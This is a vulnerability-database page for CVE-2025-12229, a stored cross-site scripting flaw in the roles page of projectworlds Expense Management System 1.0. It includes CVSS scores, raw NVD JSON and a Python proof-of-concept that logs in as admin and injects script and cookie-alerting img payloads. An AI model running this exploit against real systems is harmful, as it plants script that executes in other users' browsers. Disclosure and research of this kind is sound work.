Security Vulnerability Report
中文
CVE-2025-12229 CVSS 2.4 LOW

CVE-2025-12229

Published: 2025-10-27 06:15:39
Last Modified: 2026-04-29 01:00:02
Source: [email protected]

Description

A security flaw has been discovered in projectworlds Expense Management System 1.0. This affects an unknown function of the file /public/admin/roles/create of the component Roles Page. The manipulation results in cross site scripting. The attack may be performed from remote. The exploit has been released to the public and may be used for attacks.

CVSS Details

CVSS Score
2.4
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:projectworlds:expense_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE
projectworlds Expense Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-12229 PoC - Stored XSS in projectworlds Expense Management System 1.0 # Target: /public/admin/roles/create def exploit_xss(target_url, username, password): """ Exploit Stored XSS vulnerability in Expense Management System 1.0 Parameters: target_url: Base URL of the vulnerable application username: Admin username password: Admin password Returns: bool: True if exploitation successful, False otherwise """ session = requests.Session() # Step 1: Login to admin panel login_url = f"{target_url}/login" login_data = { 'username': username, 'password': password } try: response = session.post(login_url, data=login_data, timeout=10) if response.status_code != 200: print(f"[-] Login failed with status code: {response.status_code}") return False print("[+] Successfully logged in as admin") # Step 2: Inject XSS payload in roles/create page roles_url = f"{target_url}/public/admin/roles/create" # XSS payload - can be customized based on target xss_payload = "<script>alert('XSS Vulnerability Detected - CVE-2025-12229')</script>" roles_data = { 'role_name': xss_payload, 'description': '<img src=x onerror="alert(document.cookie)">', 'submit': 'Create' } response = session.post(roles_url, data=roles_data, timeout=10) if response.status_code == 200: print("[+] XSS payload injected successfully") print(f"[+] Payload: {xss_payload}") print("[+] The malicious script will execute when anyone views the role") return True else: print(f"[-] Injection failed with status code: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {str(e)}") return False if __name__ == "__main__": if len(sys.argv) != 4: print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>") print(f"Example: python {sys.argv[0]} http://localhost:8080 admin password123") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] print(f"[*] CVE-2025-12229 PoC - Expense Management System XSS") print(f"[*] Target: {target}") exploit_xss(target, user, pwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12229", "sourceIdentifier": "[email protected]", "published": "2025-10-27T06:15:38.590", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in projectworlds Expense Management System 1.0. This affects an unknown function of the file /public/admin/roles/create of the component Roles Page. The manipulation results in cross site scripting. The attack may be performed from remote. The exploit has been released to the public and may be used for attacks."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.9, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N", "baseScore": 2.4, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:M/C:N/I:P/A:N", "baseScore": 3.3, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE"}, "baseSeverity": "LOW", "exploitabilityScore": 6.4, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:projectworlds:expense_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "1BBB9737-D08D-4C1D-825A-31A6510358E4"}]}]}], "references": [{"url": "https://github.com/QIU-DIE/CVE/issues/10", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://vuldb.com/?ctiid.329899", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.329899", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.673706", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.